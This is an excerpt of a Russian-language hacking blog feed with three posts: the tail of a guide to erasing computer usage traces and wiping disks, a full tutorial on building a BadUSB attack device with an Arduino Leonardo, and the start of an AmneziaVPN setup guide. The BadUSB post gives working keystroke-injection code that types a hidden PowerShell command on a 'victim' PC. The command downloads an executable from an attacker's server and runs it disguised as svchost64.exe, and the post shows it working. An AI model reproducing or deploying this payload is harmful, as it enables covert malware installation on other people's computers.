  <p id="nFFE">Немного о зеленых строчках:</p>
  <figure id="g64E" class="m_column">
    <img src="https://img4.teletype.in/files/b2/cf/b2cf5fd9-ccca-4761-a844-3cb8fd7259ad.png" width="1408" />
  </figure>
  <p id="Xppp">Зеленым горит то, что сейчас в данный момент подключено к нашему пк. Так что заранее рекомендую отключить от пк всё то, что вам нужно почистить, а потом зайти в прогу и удалить. Но если это какой-то баг, то опять же - тыкаем на крестик, потом на урну. Должно сработать. Обычно используется данная прога офисными клерками перед проверками регуляторов которые запрещают подключать к пк свой телефон и смотреть там фоточки (но хотя для Сноу Денов тоже подойдет, чтобы замести факт подключения флешки и выкачивания секретных доков ЦРУ).</p>
  <p id="kFIA">Glary Tracks Eraser - скачать можно <a href="https://www.glarysoft.com/tracks-eraser/" target="_blank">тут</a>. По сути тот же BleachBit с более приятным интерфейсом. Минусы - только под винду и не дает удалить файлы с папками, что ну просто ужас. Подходит для простой очистки следов пользования ПК.</p>
  <figure id="xnjV" class="m_column">
    <img src="https://img1.teletype.in/files/cd/01/cd017a29-a8be-4342-b544-b5bea6e1a6e7.png" width="1222" />
    <figcaption>Кажется давно я не выносил мусор...</figcaption>
  </figure>
  <p id="H1JA">HDD Low Level Format Tool - скачать кряк можно <a href="https://t.me/hunterghoulchat/93" target="_blank">тут</a>. Эта прога полностью форматирует диск затирая всё нулями. Подходит когда нужно полностью почистить весь диск без возможности восстановления. Если захотите почистить так системный диск, придется загрузиться через флешку с Live-образа и запустить очистку оттуда. ВАЖНО! - Чистит весь физический диск. Т.е. если у вас в пк один жесткий диск и разделен на диск С и D (как это обычно делают в винде) - то эта прога удалит и С и D диск, и загрузочный сектор, и вообще всё что там есть удалит и затрет. Перед использованием отключите АВ, ибо кряк палится антивирусами.</p>
  <figure id="9VyX" class="m_column">
    <img src="https://img2.teletype.in/files/d3/06/d3065e39-338f-4585-8a7d-c629f501dc00.png" width="950" />
  </figure>
  <h3 id="8fTy">Вывод</h3>
  <p id="9wlf">Вот в общем то и подошла к концу данная статья. Какие выводы можно сделать из всего выше?</p>
  <ol id="b9X8">
    <li id="qLAC">Файлы на самом деле не удаляются с вашего пк, удаляется лишь информация о том где они хранятся. Потом пока вы пользуетесь пк, другая программа может занять эту свободную область памяти и перезаписать собой этот сектор. Но вы уверены что вам так повезет?</li>
    <li id="bBbc">Существуют программы для восстановления удаленных программ. Попробуйте использовать ту что я вам приложил и будете приятно удивлены.</li>
    <li id="RoTL">Существуют методики удаления файлов с затиранием данных и очисткой следов во всех журналах. Пользуйтесь на здоровье</li>
    <li id="IoP3">И последнее САМОЕ ВАЖНОЕ. Если вы храните backup вашей системы (точку восстановления на Windows) - майор просто сможет восстановить вашу порнушку и всё равно посмотреть её вместе со всем УВД под пивом. Так что не забудьте про это)</li>
  </ol>
  <p id="9MPd">На связи был Hunter Ghoul, берегите свою конфиденциальность, не делитесь с майорами фильмом. Да и вообще не нарушайте закон, тогда и чистить ничего не придется, если вы не силовик и не выполняете свою служебную задачу.</p>
  <p id="RyvZ">Благодарю за прочтение статьи.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hunterghoul_team/arduino-badusb</guid><link>https://teletype.in/@hunterghoul_team/arduino-badusb?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team</link><comments>https://teletype.in/@hunterghoul_team/arduino-badusb?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team#comments</comments><dc:creator>hunterghoul_team</dc:creator><title>Arduino - свой флиппер за 1000 рублей (делаем BadUSB)</title><pubDate>Wed, 06 Nov 2024 12:45:41 GMT</pubDate><media:content medium="image" url="https://img2.teletype.in/files/5e/ef/5eef1e7a-bd03-4abe-9274-26c7954c946e.png"></media:content><category>hackware</category><description><![CDATA[<img src="https://img3.teletype.in/files/e6/c6/e6c6d1a1-f6bd-4282-b54c-27525d31380b.jpeg"></img>Дисклеймер: все описанные действия предоставлены автором в ознакомительных целях. Большое спасибо моему товарищу подарившему и научившему азам использования данной прекрасной платы♥]]></description><content:encoded><![CDATA[
  <figure id="B4z6" class="m_column">
    <img src="https://img3.teletype.in/files/e6/c6/e6c6d1a1-f6bd-4282-b54c-27525d31380b.jpeg" width="2508" />
  </figure>
  <p id="PI4C">Дисклеймер: все описанные действия предоставлены автором в ознакомительных целях. Большое спасибо моему товарищу подарившему и научившему азам использования данной прекрасной платы♥</p>
  <h3 id="JAqp">Введение</h3>
  <p id="FcBF">Сегодня мы с вами разберем плату Arduino Leonardo - купить можно <a href="https://www.ozon.ru/category/plata-arduino-leonardo/" target="_blank">тут</a> (внимание - Китай, подделка, но в принципе работает нормально).</p>
  <p id="LWms">Для сегодняшних манипуляций она более чем подойдет. Более подробно про разные платы можете почитать <a href="https://alexgyver.ru/arduino-for-newibes/" target="_blank">здесь</a> (VPN maybe required) и <a href="https://www.ixbt.com/live/topcompile/kakuyu-arduino-vybrat-perechislenie-vseh-plyusov-i-minusov-kazhdoy-platformy.html" target="_blank">здесь</a>.</p>
  <p id="bLdP">Arduino служит платой микроконтроллера. По сути это миникомпьютер, к которому можно прицепить нужные тебе модули и сделать полноценный карманно-носимый хакерский гаджет.</p>
  <p id="pJN8">В этой статье мы с вами изучим атаку типа BadUSB с помощью Arduino Leonardo, в котором уже зашита поддержка эмуляции клавиатуры и мыши.</p>
  <p id="f2je">BadUSB - это атака, при которой подключенное к пк устройство распознается как клавиатура или мышь, и дальше исполняет payload (от англ. полезная нагрузка) для запуска вредоносного кода.</p>
  <h3 id="rZJn">Начало программирования с Arduino</h3>
  <p id="YKM9">Для начала нам понадобится:</p>
  <ol id="JBq4">
    <li id="MJaS">Плата Arduino Leonardo - купить можно например <a href="https://www.ozon.ru/category/plata-arduino-leonardo/" target="_blank">тут</a>.</li>
    <li id="1hr5">Программа Arduino IDE - <a href="https://www.arduino.cc/en/software" target="_blank">скачать</a>.</li>
    <li id="p4tt">Возможно type-c провод для подключения платы к пк (если не придет вместе с платой).</li>
  </ol>
  <p id="7wLT">И так, скачиваем и устанавливаем Arduino IDE.</p>
  <p id="9AGn">Затем вам может потребоваться <a href="https://voltiq.ru/ch340g-driver-windows-7-10/" target="_blank">скачать</a> и установить драйвер.</p>
  <p id="xmBt">После установки перезагружаем пк, подключаем нашу плату к пк и запускаем прогу.</p>
  <p id="BYCN">Ждем пока прога докачает и установит необходимые библиотеки.</p>
  <p id="7mes">Вся <strong><u>документация</u></strong> по установке, программированию, библиотекам и прочему - <a href="https://docs.arduino.cc/" target="_blank">тут</a>.</p>
  <p id="I8dF">Для начала выберем наше устройство в меню подключенных устройств.</p>
  <figure id="ag5s" class="m_column">
    <img src="https://img3.teletype.in/files/a4/da/a4da57ec-82a9-4738-b9b2-f5acdcdc96d1.png" width="764" />
  </figure>
  <p id="Ss80">Затем зайдем в Tools и выберем следующие настройки</p>
  <figure id="1EWY" class="m_column">
    <img src="https://img3.teletype.in/files/21/bf/21bfab11-e453-4e57-8365-3f47534791b2.png" width="1174" />
  </figure>
  <figure id="V4oc" class="m_column">
    <img src="https://img2.teletype.in/files/97/7f/977fbf8a-f123-4b62-8c34-6f755da38f09.png" width="1074" />
  </figure>
  <p id="ZHu5">И так, после этого наша первичная настройка завершена.</p>
  <p id="1gG6">Перейдем к разбору примера кода с <a href="https://codeby.net/threads/arduino-ehto-ehlektronnyj-konstruktor-i-udobnaja-platforma-bystroj-razrabotki-ehlektronnyx-ustrojstv.57714/" target="_blank">codeby</a>:</p>
  <figure id="boXT" class="m_column">
    <img src="https://img4.teletype.in/files/b8/5a/b85af790-c359-47e6-b557-39d840239db4.png" width="839" />
  </figure>
  <p id="laeY"><code>/* Мигание LED<br />* ----------— * codeby.net<br />* Включает и выключает светодиод (LED) подсоединенный<br />* к выходу 13, с интервалом в 1 секунду<br />*<br />*/<br />int ledPin = 13;                        // LED подсоединен к выводу 13<br />void setup ()<br />{<br />pinMode (ledPin, OUTPUT);      // устанавливаем вывод 13 как выход<br />}<br />void loop ()<br />{<br />digitalWrite (ledPin, HIGH);       // включаем LED<br />delay (1000);                           // пауза 1 секунда<br />digitalWrite (ledPin, LOW);       // выключаем LED<br />delay (1000);                           // пауза 1 секунда<br />}</code></p>
  <p id="U2uR">Здесь мы с вами подключаемся к нашему LED экрану на 13 выводе и пишем программу, чтобы у нас мигала лампочка каждую секунду (5 сек решил долго будет).</p>
  <p id="vesE">В void setup мы задаем как бы построчное исполнение программы, как в том же python условно говоря.</p>
  <p id="Wg2J">В void loop мы задаем также построчно программу, но это уже что-то вроде зацикленного цикла типа While True, так что здесь код будет постоянно повторяться вновь и вновь, что нам и нужно для того чтобы не писать самим бесконечный цикл на мигание лампочки.</p>
  <p id="wlx3">Кстати если мы зайдем в File &gt; Examples то увидим большое количество примеров кода, тыкнув на который у нас подгрузится готовый код. Мы его можем зашить в нашу плату и проверить работу, а также ознакомиться с самим кодом.</p>
  <figure id="GQwQ" class="m_column">
    <img src="https://img4.teletype.in/files/7a/d8/7ad8ca56-35e7-4efa-93d9-088105667ab6.png" width="897" />
  </figure>
  <p id="CYJG">Так вот. Для того чтобы прошить наш код, нажимаем сочетания клавиш ctrl+R (компиляция и проверка кода). Если всё прошло без ошибок, то ctrl+U - это прошивка программы в нашу плату.</p>
  <p id="jdOz">Пробуем, жмем ctrl+R:</p>
  <figure id="OUZu" class="m_column">
    <img src="https://img1.teletype.in/files/ce/d5/ced525ff-60ac-4445-85ca-5e7748b684ba.png" width="1919" />
  </figure>
  <p id="CX4C">Компиляция успешна, жмем ctrl+U</p>
  <figure id="ninh" class="m_column">
    <img src="https://img3.teletype.in/files/22/cb/22cb63cd-fa6e-4f35-9054-4db23af4eec2.png" width="1919" />
  </figure>
  <p id="OcYo">На китайской плате выдаёт такую ошибку, но это <s>рукожопость</s> недостаток самих плат собранных в подвале на коленке. Программа должна работать, проверьте, мигает ли у вас светодиод.</p>
  <p id="PZKm">Мы можем изменить время включения и выключения лампочки, поменяв значение в <code>delay (1000)</code> на своё. Обратите внимание, значение даётся в миллисекундах.</p>
  <p id="VIX3">Например поставим включенный светодиод на 1 сек, а выключенный на 0.5 сек:</p>
  <figure id="BQlR" class="m_column">
    <img src="https://img4.teletype.in/files/7c/12/7c12f5fa-3a44-410b-83ce-24a881b681c9.png" width="1919" />
  </figure>
  <p id="pN9z">Теперь у нас как-бы светодиод будет подмигивать, то есть быть дольше во включенном состоянии, моргая на пол секунды. Можно сделать наоборот чтобы было что-то вроде моргания пожарной сигнализации, поменяв значения местами. Вообщем, развелкайтесь).</p>
  <p id="koDn">Кстати код достаточно понятный, например в <code>digitalWrite ()</code> видно, что значение <code>HIGH</code> отвечает за включение светодиода, а <code>LOW</code> за его выключение.</p>
  <p id="BX2l">Обратите внимание!</p>
  <p id="lvYI">После объявление глобальной функции void setup или void loop идёт следующий синтаксис:</p>
  <ol id="94x6">
    <li id="3UQV">Открываются вот такие скобки {}</li>
    <li id="Gb98">Внутри них пишется на одной строчке команда.</li>
    <li id="PoPD">Если это функция, то значение через пробел пишутся в таких скобках () и отделяются между собой запятой</li>
    <li id="lnoI">Каждая строчка заканчивается точкой с запятой ;</li>
  </ol>
  <p id="ZlCr">Ну вот в общем то и всё, пойдемте тестить badusb код.</p>
  <h3 id="CQXb">Простой BadUSB без цикла</h3>
  <p id="EZb1">Разберём простой код:</p>
  <figure id="kvjS" class="m_column">
    <img src="https://img3.teletype.in/files/20/b6/20b62c64-b5ac-4571-b585-7d59934f9668.png" width="1919" />
  </figure>
  <p id="MRN5"><code>#include &lt;Keyboard.h&gt;<br />void setup() {<br />  Keyboard.begin();<br />  delay(2000);<br />  Keyboard.press(KEY_LEFT_GUI);<br />  Keyboard.press(&#x27;r&#x27;);<br />  delay(50);<br />  Keyboard.releaseAll();<br />}</code></p>
  <p id="82wz"><code>void loop() {</code></p>
  <p id="TPkH"><code>}</code></p>
  <p id="5dDH">Такой простой код запустит на компьютере жертвы при подключении нашей платы программу Выполнить, встроенную в Windows.</p>
  <p id="g36Z">Разберем что здесь написано:</p>
  <ol id="eV1p">
    <li id="ffJY"><code>#include &lt;Keyboard.h&gt;</code> - подключает библиотеку по работе с клавиатурой. <a href="https://github.com/arduino-libraries/Keyboard/blob/master/src/Keyboard.h" target="_blank">Документация</a>.</li>
    <li id="KMfL"><code>Keyboard.begin();</code> - инициализирует библиотеку. Наша плата начинает эмулировать клавиатуру.</li>
    <li id="M2nC"><code>delay(2000);</code> - даём паузу 2 секунды чтобы всё прогрузилось</li>
    <li id="2GWm"><code>Keyboard.press(KEY_LEFT_GUI);</code> - кнопка левого виндовс (или комманд если macos и т.д.)</li>
    <li id="aQlh"><code>Keyboard.press(&#x27;r&#x27;);</code> - кнопка r</li>
    <li id="5ZhQ"><code>delay(50);</code> - примерное время в 50 мсек, чтобы кнопки успели нажаться системой</li>
    <li id="Q51B"><code>Keyboard.releaseAll();</code> - отжимает все кнопки.</li>
  </ol>
  <p id="F9Go">И так, теперь ещё раз:</p>
  <ul id="pBdF">
    <li id="Qyzf"><code>Keyboard.begin();</code> делает из нашей платы клавиатуру (не забудьте вначале импортировать библиотеку командой <code>#include &lt;Keyboard.h&gt;</code>)</li>
    <li id="iUsC"><code>delay(мсек)</code> даёт нам паузу. 2000 мсек нужно чтобы библиотека успела прогрузиться платой и системой, 50-75 мсек нужно для того чтобы клавиша прожалась</li>
    <li id="SJFJ"><code>Keyboard.press (клавиша)</code> выполняет функцию ЗАЖАТИЯ клавиши. Мы можем передать пробел и любую клавишу внутри скобок в кавычках, напр. <code>Keyboard.press (&#x27; &#x27;)</code> или <code>Keyboard.press (&#x27;g&#x27;)</code>. Если нам нужно зажать ctrl или подобную клавишу, смотрим <a href="https://github.com/arduino-libraries/Keyboard/blob/master/src/Keyboard.h" target="_blank">документацию</a>, напр. шифт это KEY_LEFT_SHIFT и будет команда выглядеть так: <code>Keyboard.press (KEY_LEFT_SHIFT)</code>. Что важно - БЕЗ КАВЫЧЕК.</li>
    <li id="qben"><code>Keyboard.releaseAll()</code> ОТЖИМАЕТ ВСЕ КНОПКИ!!! Если не отжать то зажатые клавиши не дадут нормально пользоваться пк, не говоря о том что ваш payload не сможет выполниться. Хотя если у вас цель похулиганить можете убрать эту функцию и поприкалываться над товарищами.</li>
    <li id="KISb">И ещё есть команда <code>Keyboard.release(клавиша)</code> которая отжимает конкретную клавишу, если это вам конечно понадобится.</li>
  </ul>
  <p id="ncya">С кодом разобрались, давайте запустим команду:</p>
  <figure id="uIYY" class="m_column">
    <img src="https://img4.teletype.in/files/b9/32/b932d21a-995e-4e72-a234-ef0770be9161.png" width="1914" />
  </figure>
  <p id="qU9n">Всё работает, остается только написать payload.</p>
  <p id="38M4">Давайте допишем нашу программу следующим образом:</p>
  <p id="7ThB"><code>#include &lt;Keyboard.h&gt;<br />void setup() {<br />  Keyboard.begin();<br />  delay(2000);<br />  Keyboard.press(KEY_LEFT_GUI);<br />  Keyboard.press(&#x27;r&#x27;);<br />  delay(50);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;c&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;m&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;d&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27; &#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;/&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;c&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27; &#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;n&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;o&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;t&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;e&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;p&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;a&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;d&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;&amp;&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;c&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;a&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;l&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(&#x27;c&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();<br />  Keyboard.press(KEY_RETURN);<br />  Keyboard.releaseAll();<br />}</code></p>
  <p id="94np"><code>void loop() {</code></p>
  <p id="lfW7"><code>}</code></p>
  <p id="eK8L">Алгоритм здесь следующий - мы просто хотим выполнить в программе Выполнить команду <code>cmd /c notepad&amp;calc</code> которая запустит с помощью командной строки блокнот и клавиатуру.</p>
  <p id="40lV">Чтобы нам нажать на одну кнопку нам нужно написать три строчки:</p>
  <p id="opOz"><code>Keyboard.press(&#x27;кнопка&#x27;);<br />  delay(45);<br />  Keyboard.releaseAll();</code></p>
  <p id="Gv1v">Пробуем запустить прогу:</p>
  <figure id="XjAL" class="m_column">
    <img src="https://img3.teletype.in/files/ad/22/ad2294cf-1b52-4db7-890a-3e1bb0239b29.png" width="1760" />
  </figure>
  <p id="uJXF">Как видим всё запустилось. Но если мы переключим раскладку на русский то всё поломается:</p>
  <figure id="fgvk" class="m_column">
    <img src="https://img1.teletype.in/files/46/72/4672ab71-f024-4c4e-bf59-7698273b2967.png" width="1579" />
  </figure>
  <h3 id="D0Ve">Закачиваем и запускаем вирусы</h3>
  <p id="kJXC">Теперь разберем <a href="https://xss.is/threads/76979/" target="_blank">код</a> для скрытой загрузки и запуска файла:</p>
  <p id="dtLE"><code>#include&lt;Keyboard.h&gt;<br />#define KEY_DELAY 50<br />const char command [] = &quot; &quot; ;<br />void setup() {<br />  Keyboard.begin();<br />  delay(3000);<br />}</code></p>
  <p id="2vly"><code>void loop() {<br />  //Pressing Win+r shortcut<br />  Keyboard.press(KEY_LEFT_GUI);<br />  Keyboard.press(&#x27;r&#x27;);<br />  delay(KEY_DELAY);<br />  Keyboard.releaseAll();<br />  delay(KEY_DELAY*5);<br />  Keyboard.println(&quot;powershell -NoP -NonI -W Hidden -Exec Bypass \&quot;IEX (New-Object System.Net.WebClient).DownloadFile(&#x27;<a href="http://server_ip/file.exe" target="_blank">http://server_ip/file.exe</a>&#x27;,\\\&quot;$env:temp\\svchost64.exe\\\&quot;); Start-Process \\\&quot;$env:temp\\svchost64.exe\\\&quot;\&quot;&quot;);<br />  delay(KEY_DELAY*5);//A delay to ensure that cmd window has been started<br />  delay(10000000);<br />}</code></p>
  <p id="ropv">Создаем VPS, устанавливаем apache2, загружаем на сервер наш вредонос. Забираем на него ссылку:</p>
  <p id="2mya"></p>
  <figure id="jSaB" class="m_column">
    <img src="https://img2.teletype.in/files/d1/57/d157d583-1c19-4324-96d3-02843e01eb9e.png" width="653" />
  </figure>
  <p id="iOk3">Вставляем ссылку в <code>Keyboard.println ()</code> где это написано. прям в кавычки:</p>
  <p id="UgUV">Keyboard.println(&quot;powershell -NoP -NonI -W Hidden -Exec Bypass \&quot;IEX (New-Object System.Net.WebClient).DownloadFile(&#x27;http://62.113.104.126/crack.exe,\\\&quot;$env:temp\\svchost64.exe\\\&quot;); Start-Process \\\&quot;$env:temp\\svchost64.exe\\\&quot;\&quot;&quot;);</p>
  <p id="HTUb">Прошиваем и проверяем ctrl+U:</p>
  <figure id="EyGb" class="m_column">
    <img src="https://img1.teletype.in/files/ce/1d/ce1da377-ab53-4b1b-b974-4e63baba3871.png" width="1818" />
  </figure>
  <p id="V1nu">Как видим программа успешно скачалась и запустилась</p>
  <p id="u5SC">Вам останется только поменять ссылку в кавычках <code>DownloadFile(&#x27;<a href="http://server_ip/file.exe" target="_blank">http://server_ip/file.exe</a>&#x27;,</code> на своё значение.</p>
  <figure id="MtDA" class="m_column">
    <img src="https://img4.teletype.in/files/79/c9/79c93bb6-3577-447e-b8ab-bf9a82677f94.png" width="1662" />
  </figure>
  <p id="oPJf">Теперь остается затронуть последний момент - цикл.</p>
  <h3 id="w6sq">Делаем цикл for для автоматизации ввода команды</h3>
  <p id="relf">Рассмотрим такой код:</p>
  <p id="RZtY"><code>#include &lt;Keyboard.h&gt;<br />void setup() {<br />  Keyboard.begin();<br />  delay(2000);</code></p>
  <p id="D8FS"><code>  Keyboard.press(KEY_LEFT_GUI);<br />  Keyboard.press(&#x27;r&#x27;);<br />  delay(50);<br />  Keyboard.releaseAll();</code></p>
  <p id="c6Ee"><code>  char* x = &quot;cmd /c notepad&amp;calc&quot;;</code></p>
  <p id="GNtJ"><code>  for (int i = 0; i &lt; strlen(x); i++)<br />  {<br />    Keyboard.press(x[i]);<br />    delay(50);<br />    Keyboard.releaseAll();<br />  }<br />  Keyboard.press(KEY_RETURN);<br />  delay(50);<br />  Keyboard.releaseAll();<br />}</code></p>
  <p id="6Ii2"><code>void loop() {</code></p>
  <p id="ZClt"><code>}</code></p>
  <p id="ZeDZ">Здесь в общем то вписывается в программу Выполнить команда <code>cmd /c</code> с последующей полезной нагрузкой. Но чтобы нам не вводить символы вручную, за нас создается счётчик i, который проходится по каждому символу из переменной x.</p>
  <p id="XNEr">Всё что вам нужно - поменять содержимое x на своё, например:</p>
  <p id="ku1n"><code>char* x = &quot;powershell -NoP -NonI -W Hidden -Exec Bypass \&quot;IEX (New-Object System.Net.WebClient).DownloadFile(&#x27;<a href="http://server_ip/file.exe" target="_blank">http://server_ip/file.exe</a>&#x27;,\\\&quot;$env:temp\\svchost64.exe\\\&quot;); Start-Process \\\&quot;$env:temp\\svchost64.exe\\\&quot;\&quot;&quot;;</code></p>
  <p id="KSp9">Тут как видим у нас ошибка из-за того что первая буква не успевает нажаться:</p>
  <figure id="gUGL" class="m_column">
    <img src="https://img1.teletype.in/files/42/84/428472ae-8090-48f4-8ceb-d95d7082aae2.png" width="1918" />
  </figure>
  <p id="FM4B">Попробуем добавить немного задержки после открытия программы Выполнить:</p>
  <figure id="8ZiC" class="m_column">
    <img src="https://img2.teletype.in/files/5b/33/5b33d627-5b61-4860-a756-efa57495c691.png" width="1876" />
  </figure>
  <p id="vsqD">Теперь проверяем и всё работает:</p>
  <figure id="mAfP" class="m_column">
    <img src="https://img3.teletype.in/files/24/ed/24ed9fc3-543b-4221-b123-7053cf27efb8.png" width="1901" />
  </figure>
  <h3 id="fqcZ">Выводы</h3>
  <p id="CIqT">Arduino - достаточно дешевые и эффективные платы, которые подходят для самых различных задач, начиная от имитации клавиатур и мышек, заканчивая анализаторами радиотраффика и даже роботами.</p>
  <p id="9V1i">В отличии от готовых флагманских решений типа <a href="https://flipperzero.one/" target="_blank">Flipper Zero</a> или <a href="https://qpsk.ru/hackrf-one" target="_blank">HackRF ONE</a>, arduino учит легкому погружению в язык программирования C, самостоятельному решению задач и сборке собственных портативных устройств для хакинга.</p>
  <p id="LRCp">Подобные микроконтроллеры станут отличным стартом в мир аппаратного хакинга и сильно повысят ваши скиллы на фоне других участников комьюнити.</p>
  <p id="cz0f">Благодарю за прочтение статьи.</p>
  <p id="gelH">Готовые скетчи с кодом для Arduino IDE можно скачать <a href="https://t.me/hunterghoulchat/49?single" target="_blank">здесь</a>.</p>
  <h3 id="20Kj">Список полезной литературы</h3>
  <p id="6ThS"><a href="https://xss.is/forums/5/" target="_blank">https://xss.is/forums/5/</a></p>
  <p id="6yeV"><a href="https://xss.is/threads/76979/" target="_blank">https://xss.is/threads/76979/</a></p>
  <p id="ayMG"><a href="https://xss.is/threads/125276/" target="_blank">https://xss.is/threads/125276/</a></p>
  <p id="pc4m"><a href="https://xss.is/threads/124180/" target="_blank">https://xss.is/threads/124180/</a></p>
  <p id="U1sp"><a href="https://xakep.ru/?s=arduino" target="_blank">https://xakep.ru/?s=arduino</a></p>
  <p id="fnWt"><a href="https://xakep.ru/2021/06/17/gsm-ducky/" target="_blank">https://xakep.ru/2021/06/17/gsm-ducky/</a></p>
  <p id="kSss"><a href="https://codeby.net/forums/oborudovanie-dlja-pentesta.192/" target="_blank">https://codeby.net/forums/oborudovanie-dlja-pentesta.192/</a></p>
  <p id="hc0R"><a href="https://codeby.net/threads/besprovodnaja-hid-ataka-s-ispolzovaniem-arduino-mkr1000-utochka-dlja-wi-fi-seti.73761/" target="_blank">https://codeby.net/threads/besprovodnaja-hid-ataka-s-ispolzovaniem-arduino-mkr1000-utochka-dlja-wi-fi-seti.73761/</a></p>
  <p id="4WYe"><a href="https://codeby.net/threads/kontroller-graficheskogo-interfejsa-dlja-proektov-arduino-remotexy.72260/" target="_blank">https://codeby.net/threads/kontroller-graficheskogo-interfejsa-dlja-proektov-arduino-remotexy.72260/</a></p>
  <p id="ibsK"><a href="https://codeby.net/threads/sobiraem-dongl-dlja-raboty-s-beskontaktnymi-kartami.72019/" target="_blank">https://codeby.net/threads/sobiraem-dongl-dlja-raboty-s-beskontaktnymi-kartami.72019/</a></p>
  <p id="P7J3"><a href="https://codeby.net/threads/bad-usb-ili-kak-ja-utok-razvodil-prakticheskoe-posobie-po-rubber-duck.71821/" target="_blank">https://codeby.net/threads/bad-usb-ili-kak-ja-utok-razvodil-prakticheskoe-posobie-po-rubber-duck.71821/</a></p>
  <p id="nLbi"><a href="https://codeby.net/threads/opredeljaem-kto-doma-s-pomoschju-esp8266.66662/" target="_blank">https://codeby.net/threads/opredeljaem-kto-doma-s-pomoschju-esp8266.66662/</a></p>
  <p id="Bgvq"><a href="https://codeby.net/threads/arduino-totp-ili-google-authenticator-svoimi-rukami.61344/" target="_blank">https://codeby.net/threads/arduino-totp-ili-google-authenticator-svoimi-rukami.61344/</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hunterghoul_team/amnezia-vpn</guid><link>https://teletype.in/@hunterghoul_team/amnezia-vpn?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team</link><comments>https://teletype.in/@hunterghoul_team/amnezia-vpn?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hunterghoul_team#comments</comments><dc:creator>hunterghoul_team</dc:creator><title>AmneziaVPN - делаем свой VPN-сервер без всяких знаний</title><pubDate>Mon, 04 Nov 2024 15:44:38 GMT</pubDate><media:content medium="image" url="https://img3.teletype.in/files/23/c5/23c521fb-02f9-4912-a67e-f84e23eb05bb.png"></media:content><category>Anonimity</category><description><![CDATA[<img src="https://img3.teletype.in/files/a6/c6/a6c69c36-63a2-4758-9ecd-1f2c0e043a85.png"></img>В условиях затянувшейся информационной войны вялые попытки установить тоталитарный контроль за источниками поставки информации в глобальной сети Интернет обретают всё более продвинутые методики.]]></description><content:encoded><![CDATA[
  <h3 id="I2uX">Дисклеймер</h3>
  <p id="U1pn">Данная статья носит образовательных характер. Описанные действия используемые с целью обхода блокировок к информационным ресурсам могут караться действующим законодательством. Автор призывает не нарушать закон и использовать полученную информацию исключительно в образовательных целях.</p>
  <h3 id="6PhU">AmneziaVPN - что это за зверь</h3>
  <figure id="7pvs" class="m_column">
    <img src="https://img3.teletype.in/files/a6/c6/a6c69c36-63a2-4758-9ecd-1f2c0e043a85.png" width="1200" />
    <figcaption>Изображение AmneziaVPN. Источник - GitHub разработчика.</figcaption>
  </figure>
  <p id="IGgE">В условиях затянувшейся информационной войны вялые попытки установить тоталитарный контроль за источниками поставки информации в глобальной сети Интернет обретают всё более продвинутые методики. Регулирующие органы, ответственные за контроль оборота информацией, разрабатывают новые подходы к идентификации и блокировке ресурсов, подпадающих под определение опасных, не рекомендованных информационных источников и так далее.</p>
  <p id="589f">В связи с всё больше растущим ограничением в свободном получении и обмене информацией, активисты, выступающие за права свободного обмена и получения информацией, разрабатывают различные приложения и протоколы обхода средств защиты интернет-провайдеров.</p>
  <p id="Pg1d">Одним из решений, о котором я вам сегодня хотел бы рассказать - кросс-платформерное приложение AmneziaVPN.</p>
  <p id="vEQz">На удивление, посмотрев в Telegram инфу по данной тулзе, не нашёл большого количества статей на счёт этой штуки, что очень зря.</p>
  <figure id="IAkD" class="m_column">
    <img src="https://img4.teletype.in/files/ff/64/ff6464e6-408e-4e8c-9575-0b32d8e744e6.png" width="637" />
    <figcaption>Нет статей, но тема обсуждаемая.</figcaption>
  </figure>
  <p id="OOwy">И тут я не просто так решил начать именно с данной приложухи - ведь с помощью её вы сможете развернуть множество сервисов для обеспечения своей анонимности без знаний и навыков работы с Linux сервером. И это прекрасно.</p>
  <p id="2Jvg">Помимо этого AmneziaVPN поддерживает огромное количество VPN протоколов:</p>
  <figure id="ibgO" class="m_column">
    <img src="https://img2.teletype.in/files/5c/35/5c35e90d-48dd-4f26-92d3-9b38344e844c.png" width="809" />
    <figcaption>Список доступных протоколов и иных сервисов.</figcaption>
  </figure>
  <p id="OTPT">Кто хочет подробнее прочитать про <a href="https://ru.wikipedia.org/wiki/VPN" target="_blank">VPN</a> - можете изучить мою небольшую <a href="https://tenchat.ru/media/2750772-pochemu-vpn-nikogda-ne-zablokiruyut" target="_blank">статью</a>.</p>
